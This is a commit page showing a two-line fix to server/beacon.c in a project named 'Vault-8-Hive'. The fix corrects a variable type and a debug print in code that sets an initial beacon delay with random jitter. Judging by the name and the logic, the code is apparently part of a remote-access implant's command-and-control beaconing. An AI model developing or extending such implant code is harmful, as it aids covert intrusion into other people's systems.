Projects STRLCPY Vault-8-Hive Commits 2731a95b
🤬
  • ■ ■ ■ ■ ■ ■
    server/beacon.c
    skipped 136 lines
    137 137   DLX(4, printf("\t%32s: %-f\n\n", "Beacon Variance", beaconInfo->percentVariance));
    138 138   
    139 139   { // Determine the initial beacon delay
    140  - int initial_beacon_delay;
     140 + unsigned long initial_beacon_delay;
    141 141   
    142 142   initial_beacon_delay = beaconInfo->percentVariance > 0 ?
    143 143   beaconInfo->initDelay + calc_jitter(beaconInfo->initDelay, beaconInfo->percentVariance) : beaconInfo->initDelay;
    144 144   
    145  - DLX(4, printf("\nStarting beacon thread with initial beacon delay of %ld seconds\n", beacon_delay));
     145 + DLX(4, printf("\nStarting beacon thread with initial beacon delay of %ld seconds\n", initial_beacon_delay));
    146 146   sleep(initial_beacon_delay);
    147 147   }
    148 148   
    skipped 531 lines
Please wait...
Page is in error, reload to recover